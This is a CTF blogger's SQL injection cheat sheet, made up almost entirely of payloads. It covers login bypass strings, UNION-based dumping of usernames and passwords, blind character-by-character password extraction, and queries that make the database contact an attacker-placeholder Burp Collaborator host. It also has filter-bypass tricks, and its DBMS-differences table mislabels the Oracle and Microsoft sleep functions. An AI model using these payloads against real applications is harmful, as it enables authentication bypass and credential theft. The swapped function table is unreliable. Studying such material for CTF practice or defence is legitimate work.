keyboard_arrow_up

title: CheatSheet SQLi
date: Aug 02, 2021
tags: Writeups DamCTF CTF_review Pwn Malware Misc Reverse Web EC2_2021 CheatSheets SQLi Programming Nmap Tools PyJails HeroCTF_v3 Steganography


SQL Injection

mysql


Table of contents



DMS Information


DMS version

Oracle
SELECT banner FROM v$version
SELECT version FROM v$instance

Microsoft|MySQL
SELECT @@version

PostgreSQL
SELECT version()


DMS content

Oracle
SELECT table_name FROM all_tables
SELECT column_name FROM all_tab_columns WHERE table_name = '<table-name>'

Microsoft|PostgreSQL|MySQL
SELECT table_name FROM information_schema.tables
SELECT column_name FROM information_schema.columns WHERE table_name = '<table-name>'




Login Bypass

' OR 1=1 -- -
<username>' OR 1=1 -- -
<username>' #
<username>'/*


Dumping credentials

' AND <password-column-name> LIKE '<letter>%' -- -




Union Based Attack

SELECT a, b FROM table1 UNION SELECT c, d FROM table2

Condition :


Getting column number


Using ORDER BY :

' ORDER BY 1 -- -
' ORDER BY 2 -- -
' ORDER BY 3 -- -
...
The ORDER BY position number 3 is out of range of the number of items in the select list.


Using UNION SELECT NULL :

Oracle
' UNION SELECT NULL FROM DUAL -- - # Oracle DMS must use FROM statement

Other
' UNION SELECT NULL -- - # Using null to respect type condition
' UNION SELECT NULL,NULL -- -
' UNION SELECT NULL,NULL,NULL -- -
...
All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.


One column injection

' UNION SELECT username || '~' || password FROM users -- -

Click to see different DMS string concatenation.




Blind Injection Attack


Boolean

' AND 1=1 -- - # True
' AND 1=2 -- - # False


Using Substring :

' AND SUBSTRING((<sub-query>), 1, 1) <operator> '<letter>' -- -

Examples :

' AND SUBSTRING((SELECT password FROM users WHERE username = '<username>'), 1, 1) = '<letter>' -- -
    True : letter equal <letter>.
    False : letter different than <letter>.

' AND SUBSTRING((SELECT password FROM users WHERE username = '<username>'), 1, 1) > '<letter>' -- -
    True : letter greater than <letter>.
    False : letter equal or lower than <letter>.

Click to see different DMS substring functions.


Using Error :

TO_CHAR(1/0)
CAST('test' AS INT)

Examples :

' AND (SELECT CASE WHEN (SUBSTRING(password, 1, 1) > '<letter>') THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username = '<username>')='' -- -

'||(SELECT CASE WHEN SUBSTR(password, 1, 1)='<letter>' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='<username>')||'' -- -


Time Based

Click to see different DMS sleep functions.


OAST Injection


Using DNS Lookup :

Oracle
The following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual

The following technique works on fully patched Oracle installations, but requires elevated privileges:
SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')

Microsoft
exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'

PostgreSQL
copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'

MySQL
The following techniques work on Windows only:
LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')
SELECT ... INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'




Insert Attack




DMS Diffenrences


SQL comment

Oracle
--comment

Microsoft|PostgreSQL
--comment
/*comment*/

MySQL
#comment
-- comment
/*comment*/


String concatenation

Oracle|PostgreSQL
'foo'||'bar'

Microsoft
'foo'+'bar'

MySQL
'foo' 'bar'
CONCAT('foo','bar')


Length

Oracle
LENGTH(<string>)

MySQL|PostgreSQL
CHAR_LENGTH(<string>)

Microsoft
LEN(<string>)


Substring

Oracle
SUBSTR('foobar', 4, 2)

Microsoft|PostgreSQL|MySQL
SUBSTRING('foobar', 4, 2)


IF statement

Oracle If Statement
BEGIN
IF <condition> THEN <true-condition>; ELSE <false-condition>; END IF; END;

MySQL
IF(<condition>,<true-condition>,<false-condition>)

SQL Server
IF <condition> <true-condition> ELSE <false-condition>

PostgreSQL
SELECT CASE WHEN <condition> THEN <true-condition> ELSE <false-condition> END;


Sleep

Oracle
WAITFOR DELAY '0:0:10'

MySQL
BENCHMARK()
sleep(<time>)

PostgreSQL
pg_sleep(<time>)

Microsoft
dbms_pipe.receive_message(('x'),<time>)


Multiple query

Oracle
Can't use multiple query.

Microsoft|PostgreSQL|MySQL
<first-query>; <second-query>




Bypass filters

Space before parenthesis :
CAST ('x' AS DECIMAL)

Without comma :
-1 UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c

Space :
%09, %0A, %0C, %0D, %0B, %a0

Quotes :
CHAR(<hex-number>)

Raw hashing :
md5("ffifdyop", true) = 'or'6�]��!r,��b� # Can be guess using BF
sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!




Wordlists

Coming Soon...


Other Cheat Sheet


Interesting Writeups


My Challenges

Coming Soon...